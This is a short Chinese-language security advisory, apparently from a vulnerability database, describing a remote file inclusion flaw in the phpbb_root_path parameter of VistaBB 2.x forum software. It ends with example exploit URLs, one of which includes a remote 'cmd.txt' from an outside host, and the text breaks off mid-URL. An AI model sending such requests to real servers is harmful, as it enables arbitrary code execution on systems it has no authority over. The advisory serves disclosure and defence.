VistaBB phpbb_root_path变量远程文件包含漏洞

2006-11-0600:00:00

Root

www.seebug.org

JSON

VistaBB是一款由土耳其开发者所开发的论坛程序。

VistaBB的实现上存在输入验证漏洞，远程攻击者可能利用此漏洞在服务器上执行任意命令。

VistaBB的includes/functions_mod_user.php和includes/functions_portal.php脚本没有正确验证phpbb_root_path参数的输入，攻击者可以通过包含本地或外部资源的文件导致执行任意PHP代码。成功的攻击要求打开了register_globals。

VistaBB VistaBB <= 2.x
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

<a href=“http://www.vistabb.net/” target=“_blank”>http://www.vistabb.net/</a>


                                                GET -&gt; http://[site]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=[FILE]
EXAMPLE -&gt; http://[site]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=http://yoursite.com/cmd.txt?
EXAMPLE -&gt; http://[si

JSON